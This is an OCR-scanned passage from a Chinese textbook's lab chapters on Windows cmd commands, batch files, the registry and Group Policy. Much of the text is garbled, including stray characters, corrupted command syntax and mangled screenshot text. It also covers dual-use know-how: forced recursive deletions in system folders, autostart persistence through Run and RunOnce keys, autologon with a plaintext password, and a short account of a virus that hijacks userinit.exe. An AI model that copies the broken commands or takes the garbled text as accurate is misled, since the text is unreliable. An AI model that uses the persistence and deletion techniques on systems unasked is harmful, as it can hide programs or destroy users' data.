访问 时 间 : 。 2012 年 9 月 5 日 今天 


属性 orp Omko Braw 


(a) (b) 


图 3-1 cmd. exe 窗口 及 文件 属性 


cmd 常用 命令 在 C:\WINDOWS\system32 目录 下 ,命令 用 法 如 下 。 

(1) cd: 路 径 的 切换 。 

【 例 3-1】 执行 EE 盘 下 文件 夹 demo 中 子 文件 夹 test 下 的 do. exe 程序 。 
解答 : 

C:\Documents and Settings\Administrator > E: 


E:\> cd demo test 
E: VdemoNtest > do 回 车 


或 不 改变 当前 路 径 , 直 接 输入 : 


C:\Documents and Settings\Administrator > E:\demo\test\do [| £ 


另外 “cd..” 回 到 上 级 目录 ,“cd\” 回 到 当前 根 目录 。 
(2) dir; 显示 目录 中 的 文件 和 子 目录 列表 。 


C:\Documents and Settings\Administrator > dir 不 显示 隐藏 文件 夹 和 文件 
C:\Documents and Settings\Administrator > dir /A 显示 所 有 文件 夹 和 文件 


输出 显示 中 : 二 DIR> 表 示 是 目录 (文件 夹 ) ,如果 是 文件 则 显示 其 大 小 ,另外 dir 可 以 
指定 显示 类 型 .格式 和 时 间 信 息 等 。 指 定 类 型 : /A:D 为 目录 ; /A:R 为 只 读 文 件 ; /A:H 
为 隐藏 文件 ; /A:A 为 准备 存档 的 文件 ; /A:S 为 系统 文件 ; 符号 一 ”表示 “ 否 ” 的 前 级 ,如 
“dir /A:-d” 表 示 只 显示 文件 。 

(3) fsutil: Windows 下 的 一 个 强大 的 命令 ,可 用 于 执行 多 种 与 FAT H NTFS 文件 系 
统 相关 的 任务 。 典 型 用 法 如 下 。 

D 获得 各 个 驱动 器 盘 符 。 


> fsutil fsinfo drives 
驱动 器 : C:V D:\ E:N F:\ G:V EN IN 


© 创建 一 个 大 小 为 300 字 节 的 new. txt, 

> fsutil file createnew new. txt 300 

(4) del (erase); 删除 指定 文件 。 语 法 : 

del [Drive:][Path]FileName[ …][/p] [/£] [/s] [/q] [/a[ :attributes]] 


其 中 ,参数 [Drive: ][Path] FileName 指定 要 删除 的 文件 或 文件 集 的 位 置 和 名 称 ,需要 
Filename。 可 以 使 用 多 个 文件 名 ,用 空格 、 逗 号 或 分 号 分 开 文件 名 。 典 型 用 法 如 下 。 

【 例 3-2] 要 删除 驱动 器 C:\ 上 名 为 test 文件 夹 中 的 所 有 文件 。 

解答 : 


> del c:\test 


> del c:\test\*.x 
>del * .tc 


删除 x*. txt 文件。 


> del /a /f/q c:\test 


在 静音 模式 下 (不 提示 确认 删除 ?删除 test 文件 夹 中 的 所 有 文件 。 
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(5) MD: 创建 目录 。RD : 删除 目录 。 
【 例 3-3】 在 下 盘 下 创建 \testl\\test2\test3\test4 目录 ,其 中 testl 不 存在 。 
解答 : 


MD E:\test1\\test2\test3\test4 


【 例 3-4】 在 静音 模式 下 删除 EE 盘 下 testl 文件 夹 及 其 所 有 子 文件 夹 及 文件 。 
解答 : 


RD/q/s E:\test1 


其 中 ,/s 除 目录 本 身 外 ,还 将 删除 指定 目录 下 的 所 有 子 目 录 和 文件 ,用 于 删除 目录 树 ; 
/4 表示 安静 模式 。 
(6) cacls: 显示 或 修改 文件 的 访问 控制 列表 (ACL)。 语 法 : 


cacls FileName [/t] [/e] [/g User:permission] [/r User […]] [/p User:permission […]] [/d 
User […]] 


a/t: 更 改 当前 目录 和 所 有 子 目 录 中 指定 文件 的 ACL。 

a/e: 编辑 ACL, 而 不 是 替换 它 。 

æ /g User:permission: 将 访问 权限 授予 指定 用 户 。 

æ /p User:permission 替代 指定 用 户 的 访问 权限 。 包 括 : n 表示 无 ,r 表示 读 取 ,w 表示 
j A c 表示 更 改 ( 写 人 ),F 表示 完全 控制 。 

a/r User; 取消 指定 用 户 的 访问 权限 。 

a/d User: 拒绝 指定 用 户 的 访问 。 

【 例 3-5] 禁止 guests 组 用 户 使 用 cmd. exe, 再 解禁 。 

解答 : 


cacls c:\windows\system32\cmd. fe /d guests (禁止 ) 
cacls c:\windows\system32\cmd. exe /e /r guests (解禁 ) 


(7) echo: 打开 回 显 或 关闭 请 求 回 显 功能 。 
当 echo 设置 off 值 的 时 候 , 表 示 下 面 的 指令 都 将 只 执行 而 不 显示 , 当 再 次 出 现 echo on 
时 下 面 的 语句 才 为 可 见 的 ( 回 显 ) 。 


echo aaaaa > a. txt 


即 可 将 本 在 显示 器 上 显示 的 信息 aaaaa 输出 到 文件 a. txt 中 。 如 果 文 件 a. txt 本 来 已 
经 存在 ,该 命令 将 首先 擦 除 a. txt 中 的 所 有 信息 ,然后 写 入 信息 aaaaa; # a. txt 本 来 就 不 存 
在 ,该 命令 即 可 新 建 一 个 a. txt 文件 ,并 写 人 信息 aaaaa。 


echo aaaaa >> a. txt 


类 似 于 “echo aaaaa>a. txt”. KIJE F. WÈ a. txt 本 已 存在 “二 a. txt” 会 擦 除 a. txt 
PRERA RR. mM > >a. txt” 并 不 擦 除 原 有 内 容 , 仅 在 a. txt 文件 的 末尾 添加 信息 aaaaa。 
a. txt 不 存在 时 ,二 者 没有 差别 。 

(8) ATTRIB: 显示 或 更 改 文件 属性 。 语 法 : 


ATTRIB [ +R| - R][ +A| - AJ[ + S| - S][ + H| - H][ [drive: ][path][ filename] 


“十 ”表示 设置 属性 ,“ 一 ”表示 清除 属性 ,“R” 表 示 只 读 文件 属性 ,“A” 表 示 存 档 文件 属 
性 ,“S” 表 示 系 统 文件 属性 ,“H” 表 示 隐 藏 文件 属性 。 

【 例 3-6】 将 下 盘 test 文 件 夹 的 属性 设置 为 隐藏 和 系统 。 

解答 : 


attrib +h +sE:\test 


2) 环境 变量 

环境 变量 是 一 个 具有 特定 名 字 的 对 象 , 它 包含 了 一 个 或 者 多 个 应 用 程序 所 将 使 用 到 的 
信息 。 例 如 path, 当 要 求 系统 运行 一 个 程序 而 没有 告诉 它 程序 所 在 的 完整 路 径 时 ,系统 除 
了 在 当前 目录 下 面 寻找 此 程序 外 ,还 应 到 path 中 指定 的 路 径 去 找 。 用 户 通 过 设置 环境 变量 
可 更 好 地 运行 进程 。 打 开 *“ 我 的 电脑 ”的 右键 快捷 菜单 ,选择 “属性 ”一 “高 级 ”>“ 环 境 变 量 ”。 
环境 变量 分 为 两 类 : 用 户 变 量 与 系统 变量 ,在 注册 表 中 都 有 对 应 的 项 。 

(1) 用 户 变 量 所 在 位 置 : HKEY_CURRENT_USER\Environment。 

(2) 系统 变量 所 在 位 置 为 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\ 
Control\SessionManager\ Environment, 


台 计 算 机 上 Path 的 示例 : 


Path = {% systemroot % \ system32; % systemroot % ; % systemroot% \ system32 Ñ wbem; c: \ 
programfiles\common files\ thunder network\kankan\codecs; c:\program files\microsoft sql 
server\90\tools\binn\;c:\opencv2. 1\vc2008\bin; % JAVA_HOME % /bin; % JAVA_HOME % /jre/bin ; 
C:\Program Files\Common Files\Autodesk Shared\ ;E: NWinDDK) 


常见 环境 变量 : 

(1) %USERNAME%: 返回 当前 登录 的 用 户 名 称 。 

(2) %UserProfile% : 返回 当前 用 户 的 配置 文件 的 位 置 。 
(3) % WINDIR%% : 返回 操作 系统 目录 的 位 置 。 

(4) %OS%: 返回 操作 系统 的 名 称 。 

(5) %SYSTEMROOT%: 返回 Windows 根 目 录 的 位 置 。 
命令 行 查看 方法 : 


x x` x 


> echo % USERNAME % 


3) 批 处 理 
批 处 理 (Batch) ,也 称 为 批 处 理 脚本 。 顾 名 思 义 , 批 处 理 就 是 对 某 对 象 进行 批量 的 处 理 。 
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批 处 理 文件 的 扩展 名 为 . bat。 

【 例 3-7] 在 这 个 例子 中 ,驱动 器 G 中 磁盘 上 的 所 有 文件 均 复制 到 d:\back 中 。 显 示 
的 注释 提示 将 另 一 张 光盘 放 人 驱动 器 G 时 ,pause 命令 会 使 程序 挂 起 ,以 便 更 换 光盘 ,然后 
按 任 意 键 继续 处 理 。 代 码 如 下 所 示 。 


@echo off 

:begin 

copy G: * . * d:\back 
echo 请 插入 另 一 张 光盘 … 
pause 

goto begin 


5. 实践 操作 及 步骤 


1) cmd 命令 的 使 用 

【 例 3-8] 在 D 盘 下 新 建 一 个 文件 夹 *test” ,将 notepad. exe 复制 到 文件 夹 test 中 操作 
步 又 如 下 。 

(1) 打开 cmd。 

(2) 输入 “cd /d D:\”, 将 当前 目录 改 成 D 盘 。 

(3) 输入 "md test”, 在 当前 目录 创建 一 个 test 文件 夹 。 

(4) $i A “copy % windir% \system32\ notepad. exe test”, 将 记事 本 复制 到 test 文件 
夹 中 。 

2) 批 处 理 文件 

【 例 3-9] 建立 批 处 理 文件 ,解释 下 面 每 行 命令 的 意思 。 


@echo off 

echo 砍 正 在 清除 系统 垃圾 文件 六 ,请 稍 等 … 

del /f /s /q % systemdrive % \ * . tmp 

del /f /s /q % systemdrive % \recycled\ * . * 

del /f /s /q %windir % \prefetch\ * . * 

del /f /q % userprofile % \cookies\ * . * 

del /f /q % userprofile % \recent\ *. * 

del /f /s /q " % userprofile % \Local Settings\Temporary Internet Files\ *. *" 
del /f /s /q " % userprofile % \Local Settings\Temp\ * . * " 
del /f /s /q " % userprofile % \recent\ * . * " 

echo 清除 系统 垃圾 完成 ! 


新 建 一 个 记事 本 文件 ,将 上 述 内 容 复制 到 该 文件 中 ,保存 并 关闭 ,重新 命名 为 批 处 理 并 
将 扩展 名 改 为 . bat。 双 击 即 可 运行 。 


6. 思考 题 
视窗 操作 界面 和 命令 提示 符 对 系统 的 操作 有 什么 区 别 和 联系 ? 


注册 表 和 组 策略 


1. 实践 目的 
掌握 操作 注册 表 和 组 策略 的 方法 。 
2. 实践 环境 


jË À. Internet 的 计算 机 一 台 , 安 装 Windows XP, Windows 7 或 
Windows 8 等 操作 系统 。 


3. 名 词 解释 


(1) 注册 表 : 注册 表 是 Windows 系统 中 一 个 非常 重要 的 数据 库 , 它 
存储 着 计算 机 的 软 、 硬 件 设置 。 

(2) 组 策略 : 组 策略 是 管理 员 为 计算 机 和 用 户 定义 的 ,是 用 来 控制 
应 用 程序 .系统 设置 和 管理 模板 的 一 种 机 制 。 组 策略 就 是 介 于 控制 面板 
和 注册 表 之 间 的 一 种 修改 系统 、 设 置 程序 的 工具 。 


4. 预备 知识 


1) 注册 表 的 结构 

Windows 的 注册 表 (Registry) 实 质 上 是 一 个 庞大 的 数据 库 , 它 存储 
着 下 面 这 些 内 容 : 软 、 硬 件 的 有 关 配 置 和 状态 信息 ,应 用 程序 和 资源 管理 
器 外 壳 的 初始 条 件 .首选 项 和 印 载 数 据 ; 计算 机 整个 系统 的 设置 和 各 种 
许可 ,文件 扩展 名 与 应 用 程序 的 关联 ,硬件 的 描述 .状态 和 属性 ; 计算 机 
性 能 记录 和 底层 的 系统 状态 信息 ,以 及 各 类 其 他 数据 。 注 册 表 编辑 器 的 
打开 方式 : 选择 “开始 ”>“ 运 行 ”, 输 入 “regedit”, 单 击 “ 确 定 ” 按 钮 。 

注册 表 是 按照 根 键 CHKEY)、 键 、. 子 键 以 及 值 项 的 层次 结构 来 组 织 
的 ,每 个 值 项 有 三 方面 属性 , 即 名 称 数据 类 型 和 值 ,如 图 4-1 所 示 。 

(1) HKEY_CLASSES_ROOT: 基层 类 别 键 ,定义 了 系统 中 所 有 已 
经 注册 的 文件 扩展 名 ,文件 类 型 文件 图 标 等 。 

(2) HKEY_CURRENT_USER(HKLU): 定义 了 当前 用 户 的 所 有 
权限 ,实际 上 就 是 HKEY_USERS\. Default 下 面 的 一 部 分 内 容 , 包 含 了 
当前 用 户 的 登录 信息 。 
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| 注册 表 编 辑 器 
文件 E) MED SEV KAW 帮助 (四) 
C CobeviceInstallers | 名称 ET 
C CON Name Arbiter CSI x 
人 国 hutochkTineout REG_DWORD Ox00000005 (5) 
° s. 国 BeotExecute REG MULTI SZ autocheck autochk * 
Cr 国 criticalSectionTineout REG_DWORD 0x00278400 (2692000) 
国 Enablack REG_DWORD oz00000001 (1) 


CriticalDeviceDatab: = 
Pas es igi | 鸭 EnablacE REG_DWORD 0x00000000 (0) 


O FilesSystea ||| 固 ExeladeFronnowDlls REG_MULTI SI 
四国 Fonthssoc 


8zn0UTUUDO- tt 
a0 GraphicsDrivers ES IWR 0x00000000 (0) 
C cronporderi B Qx00000000 (0 
| 
hivelist 0z00000000 (0) 
aE IDConfigD3 鸭 Licenz=b--cessors REG DWORD 0x000nnnn2 (2) 
由 回 Keybohrd Layout 国 0bject 名 称 tories REESE Wine 值 \RPC Control 
aE Keyboprd Layouts EdProcessorControl REv VIRD 0x00000002 (2) 
由 四 Lea 项 Protect ionMode REG_DWORD 0x00000001 (1) 


SE Med ` tegories 国 RegisteredProcessors REG_DYORD 0x00000002 (2) 


由 回 MediaInterfaces ERa: TineoutCount REG_DWORD 0x0009e340 (648000) 
由 回 MediaProperties hp iii ' 


i CI MediaResources 
DA MediaSets 
外 四 ala 


的 电 且 VET LOCAL MACHINENSTS TEN Current ControlSet \Control\Session Manager 


图 4-1 注册 表 编 辑 器 


(3) HKEY_LOCAL_MACHINECHKLM): 定义 了 本 地 计算 机 (相对 网 络 环境 而 言 ) 
的 软 硬 件 的 全 部 信息 。 当 系统 的 配置 和 设置 发 生变 化 时 ,其 下 面 的 登录 项 也 会 随 之 改变 。 

U) HKEY_USERS: 定义 了 所 有 的 用 户 信息 ,其 中 部 分 分 支 将 映射 到 HKEY _ 
CURRENT_USER 关键 字 中 , 它 的 大 部 分 设置 都 可 以 通过 控制 面板 来 修改 。 

(5) HKEY_CURRENT_CONFIG: 定义 了 计算 机 的 当前 配置 情况 ,如 显示 器 .打印机 
等 可 选 外 部 设备 及 其 设置 信息 等 。 它 实际 上 也 是 指向 HKEY_LOCAL_MACHINE\Config 
结构 中 的 某 个 分 支 的 指针 。 

(6) 键 与 子 键 : 键 与 子 键 的 结构 类 似 于 文件 夹 与 子 文件 夹 。 在 键 中 可 以 包含 值 项 与 
子 键 。 

(7) 值 项 : 每 个 注册 表 项 或 子 项 都 可 以 包含 称 为 值 项 的 数据 。 有 些 值 项 存储 特定 于 每 
个 用 户 的 信息 ,而 其 他 值 项 则 存储 应 用 于 计算 机 所 有 用 户 的 信息 。 值 项 的 数据 类 型 说 明 如 


表 4-1 所 示 。 
表 4-1 值 项 的 数据 类 型 
数据 类 型 说 m 

二 进 制 数据 。 多 数 硬件 组 件 信息 都 以 二 进 制 数据 存储 ,而 以 
kawana 十 六 进 制 格式 显示 在 注册 表 编辑 器 中 

双 字 。 它 占用 4 字 节 的 长 度 。 设 备 驱 动 程序 和 服务 的 很 多 
人 参数 都 是 采用 这 种 类 型 
REG_EXPAND SZ 长 度 可 变 的 字符 串 , 如 包含 变量 (例如 %system% ) 的 字符 串 
REG MULTI SZ £=, 310 ENDENE Ph2E 81 
REG SZ 国定 长 度 的 字符 囊 
REG_FULL RESOURCE DESCRIPTOR eg ta s 不 能 修改 


对 注册 表 的 编辑 可 以 直接 打开 注册 表 编 辑 器 进行 修改 ,如 图 4-1 所 示 ; 也 可 以 使 用 控 
制 台 注册 表 工 具 reg 命令 修改 ,使 用 方法 如 下 。 
(1) REG ADD 增加 注册 表 项 命令 。 


> reg add HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v serv /d calc. exe 


其 中 ,/v 指定 要 添加 到 指定 子 项 下 的 注册 表 项 名 称 ,/d Data 指定 新 注册 表 项 的 数据 ， 
/ve 指定 为 空 值 的 项 。 
(2) REG QUERY 查询 注册 表 项 命令 。 


> reg query HKLM\SOFTHARE\Microsoft\Windows\CurrentVersion\Run 

输出 Run 项 下 的 值 : 

360Safetray REG SZ "D:\Program Files\360\360Safe\safemon\360tray. exe" /start 
< 没有 名 称 > REG_SZ 


egui REG SZ "C:\Program Files\ESET\ESET Smart Security\egui. exe" /hide 
serv REG SZ calc. exe 


(3) REG DELETE 删除 注册 表 项 命令 。 
Reg deleteHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v serv /f 
其 中 ,/f 表示 不 需要 确认 。 


Reg deleteHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /ve /f 


可 以 删除 上 面 (没有 名 称 ) 的 空 值 的 项 。 
(4) REG EXPORT 导出 注册 表 项 命令 。 


> reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e:\1. reg 


在 注册 表 编 辑 器 中 , 右 击 Run 弹出 右键 快捷 菜单 ,选择 “导出 ”命令 , 则 实现 REG 
EXPORT 命令 一 样 的 功能 ,如 图 4-2 所 示 。 
(5) REG IMPORT 导入 注册 表 项 命令 。 


> reg import e:\1.reg 


其 他 命令 还 有 REG COMPARE, REG COPY, REG SAVE, REG RESTORE, REG 
LOAD, REG UNLOAD 等 。 当 注册 表 编 辑 器 被 锁 住 而 不 能 打开 时 ,并 不 影响 REG 命令 对 
注册 表 的 修改 。 

2) 组 策略 

组 策略 (Group Policy) 是 管理 员 为 用 户 和 计算 机 定义 并 控制 程序 .网络 资 源 及 操作 系 
统 行为 的 主要 工具 。 通 过 使 用 组 策略 可 以 设置 各 种 软件 .计算 机 和 用 户 策 略 。 组 策略 设置 
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TRO saw EEV RRO WË QD 


由 国 FhotoPropertyHand A|| 名 称 == 数据 
m policies GU)  REG_SZ GARRE) 
EE PropertySysten B3605af. .. REG_SZ “D:\Progran 
由 国 Reinstall erui REG_SZ “C:\Program 
昌国 huiwility 国 mcn .. REG_SZ RUNDLL32 EXE| 


eS]iedi... REG SZ BunDLL32. exe| 
C: Progran 了 


图 4-2 导出 (保存 ) 注 册 表 项 


就 是 在 修改 注册 表 中 的 配置 。 当 然 ,组 策略 使 用 了 更 完善 的 管理 组 织 方法 ,可 以 对 各 种 对 象 
中 的 设置 进行 管理 和 配置 , 远 比 手工 修改 注册 表 方 便 、 灵 活 , 功 能 也 更 加 强大 。 组 策略 编辑 
器 的 打开 方式 : 选择 “开始 ”>“ 运 行 ”, 输 入 gpedit. msc, 单 击 * 确 定 "按钮 。 如 果 组 策略 被 禁 
用 , 则 进入 安全 模式 解锁 即 可 。 如 图 4-3 所 示 。 


> 用 户 登 录 时 自动 启用 
ee a 


Ë iba 否 有 变动 , 系 
HENSII 次 


图 4-3 组 策略 编辑 器 


组 策略 包括 计算 机 配置 和 用 户 配置 。 

(1) 计算 机 配置 包括 所 有 与 计算 机 相关 的 策略 设置 .它们 用 来 指定 操作 系统 行为 桌面 
行为 .安全 设置 .计算 机 开机 与 关机 脚本 、 指 定 的 计算 机 应 用 选项 以 及 应 用 设置 。 

(2) 用 户 配置 包括 所 有 与 用 户 相关 的 策略 设置 ,它们 用 来 指定 操作 系统 行为 、 桌 面 设 
置 、 安 全 设置 .指定 和 发 布 的 应 用 选项 .应 用 设置 ,文件 夹 重 定向 选项 .用户 登 录 与 注销 脚 
本 等 。 

让 新 修改 的 计算 机 策略 立即 生效 : 


gpupdate /target:compute /force 
让 新 修改 的 用 户 策略 立即 生效 : 


gpupdate /target :user/force 


5. 实践 操作 及 步骤 


1) 编辑 注册 表 

(1) IE 设置 。 

打开 注册 表 , 在 HKLU 和 HKLM 下 \Software\Microsoft\ Internet Explorer 找到 
Main 项 并 双击 ,在 右边 的 值 项 中 找到 Start Page 值 项 ,双击 ,输入 要 设置 主页 的 地 址 
“www, znufe. edu. cn”, 其 中 HKLU 下 的 键 值 优先 ,如 图 4-4 所 示 。 


0200000001 (1) | 
yes 
yes 


我 的 电脑 HKEY_CURRENT_VSER\SoftwareVli crosoft\Internet Explorer Wain 


图 4-4 修改 Start Page 值 项 


在 HKLM 下 \Software\Microsoft\Internet Explorer\Main ,在 右边 的 值 项 中 如 果 没 有 
则 新 建 First Home Page( REG_SZ 类 型 ) ,输入 "www. znufe. edu. cn”, 

(2) 设置 密码 登录 和 自动 登录 。 

方法 一 ,打开 注册 表 , 由 HKLM\SOFTWARE \Microsoft\ Windows NT\CurrentVersion 找 
到 Winlogon 项 并 双击 ,在 右边 的 值 项 中 新 建 以 下 三 项 键 值 。 


Z "AutoAdminLogon" = "1" 键 值 为 1, 用 于 设置 自动 登录 ; 键 值 为 0, 则 反之 。 
如 "DefaultUserName" = "用 户 名 " 键 值 为 自动 登录 默认 的 用 户 名 。 
Æ "DefaultPassword" = "密码 " 键 值 为 自动 登录 用 户 的 密码 。 


方法 二 ,命令 行 输入 control userpasswords2 并 回 车 ,在 “用 户 账户 ”中 ,不 选 “ 要 使 用 本 
机 ,用 户 必须 输入 用 户 名 和 密码 " 复 选 框 , 单 击 “确定 ”按钮 后 立刻 弹出 “自动 登录 ”对 话 框 ,在 
其 中 输入 默认 项 即 可 ,如 图 4-5 所 示 。 下 次 启动 计算 机 时 可 自动 登录 。 相 应 的 注册 表 项 随 
之 添加 。 

(3) 设置 自 启动 。 

注册 表 中 可 以 设置 程序 开机 自 启动 .主要 涉及 以 下 几 个 表 项 ,这 些 表 项 也 是 杀毒 软件 重 
点 严防 的 地 方 ,具体 有 下 面 几 个 键 值 。 


HKLM\ Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit 
C:\WINDOWS\ system32\userinit. exe 


userinit. exe 是 Windows 操作 系统 的 一 个 关键 进程 ,用 于 管理 不 同 的 启动 顺序 。 例 如 
在 建立 网 络 连接 和 Windows 壳 的 启动 ,系统 刚 启动 时 ,如果 调 出 任务 管理 器 就 会 看 到 
userinit. exe, 但 过 一 段 时 间 , 系 统 各 项 加 载 完 毕 后 ,userinit. exe 就 会 自动 消失 。 


Administrator 


Administrator 


ASPNET 
TusR_20110526-0 


添加 四 ) 

Adninistrator 的 密码 

E ` eia 请 按 Ctrl- 癌 t-Del 并 选择 “更 改 密 
RGS 0) 


iY ] [| io) 


图 4-5 用 control 命令 设置 自动 登录 


机 器 狗 病 毒 将 原 有 的 userinit. exe 改名 存储 ,然后 创建 自己 的 userinit. exe, 系 统 开机 启 
动 后 ,伪装 userinit. exe 启动 后 创建 svchost. exe 进程 ,然后 调用 原 有 的 userinit. exe 完成 正 
常 启动 ,随后 自己 结束 。svchost. exe 是 病毒 的 主角 ,开始 在 本 地 端口 4444 号 上 监控 ,同时 
疯狂 下 载 诸如 kaqhjaz. exekawdeaz. exe 等 病毒 。 


HKCU\ Software\Microsoft\Windows\CurrentVersion\Polices\Explorer\Run 
HKLM\ Software\Microsoft\Windows\CurrentVersion\Polices\Explorer\Run 


如 果 没 有 Run 项 ,可 以 新 建 一 个 ,然后 在 Run 项 下 新 建 一 个 REG_SZ 的 键 值 ,如 图 4-6 
所 示 。 


Ea REG SZ READ 
ab)aaa REG_SZ CAWindows\System32\calc.exe 


图 4-6 Run 项 中 建立 自 启动 


HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 


RunOnce 项 中 建立 自 启动 如 图 4-7 所 示 。 
开机 运行 notepad. exe 后 , 键 值 aaa 即 被 删除 。 


图 4-7 RunOnce 项 中 建立 自 启动 


HKCU\ Software\Microsoft\WindowsNT\CurrentVersion\Windows\ load 


load 键 值 建立 自 启动 如 图 4-8 所 示 。 


名 称 类 型 数据 
ab) Device REG_SZ Microsoft XPS Document Writer,wins 
Documents — REG SZ 
28) DosPrint REG SZ no 
REG SZ c\windows\system32\notepad.exe 

29NetMessage REG_SZ no 

D Winlogon 国 Nupor REG SZ None 
| 


n 
tHKEY-CURRENT_USER\Sofiware\Microcof\ Windows NTVCurrentVersioriWindows 


图 4-8 load 键 值 建 立 自 启动 


HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
HKLM\ Software\Microsoft\Windows\CurrentVersion\Run 


Run 项 下 的 自 启 动 键 值 是 最 常见 的 。 

2) 配置 组 策略 

(1) 关闭 系统 还 原 功能 。 

在 “本 地 组 策略 编辑 器 ?中 ,展开 “计算 机 配置 ”管理 模板 ”~ 系统 ”~ 系统 还 原 " 项 ， 
在 右 窗 格 双击 一 “关闭 系统 还 原 " 策 略 , 在 属性 对 话 框 中 选择 “已 启用 ” 单 选 按钮 , 单 击 “ 确 定 ” 
按钮 ,启用 此 设置 来 关闭 系统 还 原 。 

(2) 审核 登录 账户 。 

在 “本 地 组 策略 编辑 器 "中 ,展开 “计算 机 配置 "一 “Windows 设置 "一 “安全 设置 "一 “ 
地 策略 ”>“ 审 核 策 略 " 项 。 

默认 情况 下 皆 为 “无 审核 >, 如 图 4-9(a) 所 示 。 双 击 “ 审 核 登 录 事件 "策略 , 则 弹出 如 
4-9(b) 所 示 对 话 框 ,选择 审核 成 功 ,失败 ”项 , 单 击 “ 确 定 ” 按 钮 。 图 4-9(c) 显 示 该 策略 已 对 
用 户 登 录 的 “成 功 ,失败 ”事件 设置 为 审核 。 

这 样 每 次 账户 登录 在 Windows 时 成 功 或 失败 事件 就 会 记录 到 Windows 日 志 中 。 查 看 
Windows 日 志方 法 : 选择 “开始 ”>“ 运 行 ”, 输 入 “eventvwr. msc”, 单 击 “ 确 定 ” 按 钮 。Windows 
日 志 示 例如 图 4-10 所 示 , 记 录 了 账户 登录 信息 。 
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4-9 账户 登录 审核 


日 期 和 时 间 来 源 
2014/3/25 21:0505 Microsoft Windows 安全 审核 
2014/3/25 21:05:05 Microsoft Windows 安全 审核 


2014/3/25 21:05:02 Microsoft Windows 安全 审核 


(b) 


4-10 Windows 日 志 示例 
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Windows 下 的 日 志 放 在 系统 目录 %SystemRoot%\system32\config 下 ,记录 着 各 种 系 
统 服务 的 启动 .运行 .关闭 等 信息 , 常 保 存在 二 进 制 文件 中 ,需要 特殊 的 工具 提取 和 分 析 。 安 
全 日 志 、 应 用 程序 日 志和 系统 日 志 等 文件 受 Event Log (事件 记录 ) 服 务 的 保护 ,不 能 被 删 
除 ,但 可 以 被 清空 。 值 得 注意 的 是 ,修改 日 志文 件 是 攻击 者 的 第 一 件 事情 ,因此 不 能 始终 相 
信 系统 日 志文 件 。 

G) 个 性 化 任务 栏 和 “开始 ”菜单 。 

OD 给 “开始 "菜单 减肥 : 在 “组 策略 ”窗口 中 ,可 以 启用 “从 开始 菜单 删除 用 户 文件 夹 ”、 
“从 开始 菜单 删除 公用 程序 组 “从 开始 菜单 中 删除 “我 的 文档 ’ 图 标 ” 等 多 种 组 策略 配置 项 
目 来 去 掉 不 需要 的 菜单 项 ,如 图 4-11 所 示 。 


XED MEW SEV HHW 
*€ > om Be 2m 
E] “本 地 计算 机 ”策略 “ RO RIS NE L IE 22 


选择 一 个 项 目 来 查看 它 的 描述 。 


设置 
Ë 人 [开始 ] S PBPPP Xr 


ËS SPSS] “Yinaovs Update” MAMIE 
SON [rt] 菜单 删除 公用 程序 组 
SO FR) 菜单 中 删除 “我 的 文档 ”图 标 
A F 菜单 上 删除 “文档 ”菜单 
a nesen [开始 ] A 人 设置 薪 单机 除 程序 
ÉA [开始 」 菜单 删除 “网络 连接 
š 3 Sm f 从 [开始 」 菜单 中 删除 “收藏 丈 ” 菜单 
生 共享 文件 来 从 「 开 始 」 菜单 中 删除 “搜索 ”菜单 
- 从 「 开 始 | 菜单 删除 “帮助 ”命令 


图 4-11 个 性 化 任务 栏 和 “开始 "菜单 


© 保护 好 任务 栏 和 “开始 "菜单 : 如 果 不 想 随意 让 他 人 更 改 任务 栏 和 开始 菜单 的 设置 ， 
只 要 启用 “阻止 更 改 “ 任 务 栏 和 开始 菜单 设置 "和 “阻止 访问 任务 栏 的 上 下 文 菜单 ”两 个 策略 
即 可 。 

© 禁止 关机 : 启动 计算 机 后 ,如 果 不 希 望 用户 进 行 关机 操作 ,那么 启用 “删除 和 阻止 访 
问 ' 关 机 ;命令 ”策略 。 

@ 利用 组 策略 保护 个 人 文档 隐私 : 如 果 不 希 望 用 户 查 看 曾经 访问 过 的 文件 ,只 要 在 组 
策略 窗口 中 的 “任务 栏 和 开始 菜单 ”项 中 ,启用 “不 要 保留 最 近 打开 文档 的 记录 ”和 “退出 时 清 
除 最 近 打 开 的 文档 的 记录 ”两 个 策略 即 可 。 

(4) 个 性 化 桌面 。 

(D 隐藏 桌面 的 系统 图 标 : 如 图 4-12 所 示 , 只 要 启用 “隐藏 桌面 上 “网 上 邻居 ?图标 >”“ 隐 
藏 桌面 上 的 Internet Explorer 图 标 ?”“ 隐 藏 和 禁用 桌面 上 的 所 有 项 目 "“ 删 除 桌面 上 的 "我 
的 文档 ?图 标 ?“ 删 除 桌面 上 的 “我 的 电脑 "图标 > 和”* 从 桌面 删除 回收 站 ?等 策略 就 可 以 隐藏 
桌面 上 的 相应 图 标 。 

© 退出 时 不 保存 桌面 设置 : 启用 * 退 出 时 不 保存 设置 ?策略 可 以 防止 用 户 保存 对 桌面 

的 某 些 更 改 ( 如 图 标的 位 置 、 任 务 栏 的 位 置 及 大 小 等 ) .不 过 任务 栏 上 的 快捷 方式 总 可 以 被 
保存 。 

@ 禁用 Active Desktop: 活动 桌面 是 Windows 系统 中 自 带 的 高 级 功能 ,最 大 的 特点 是 
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可 以 设置 各 种 图 片 格式 的 墙纸 ,甚至 可 以 将 网 页 作为 墙纸 显示 。 考 虑 性 能 因素 ,需要 禁用 这 
一 功能 ,打开 “桌面 ”中 Active Desktop 目录 ,在 右 侧 窗 格 中 启用 “禁用 Active Desktop” 策 
略 , 可 以 禁用 活动 桌面 。 


文件 中 REW SEW WQ 


ory 
面 上 的 所 有 项 目 
Å 出院 旧 面 上 的 “我 的 文档 ”图 标 
A SRATH “ROLA” BF 
Å LATER “Etu” Elir 
2320 f RAS” EFIR pA “RE” 
Active Doskt ÉS Rea” EFRR “RE” 
@ Active Direc ÉS Spa A” FF eee 
Saam t “PL tss” 图 标 


图 4-12 个 性 化 桌面 


(5) IE 浏览 器 设置 。 

O 禁用 下 浏览 器 的 某 些 菜单 项 : 在 “浏览 器 菜单 "目录 项 ,启用 * 禁 用 “在 新 窗口 中 打 
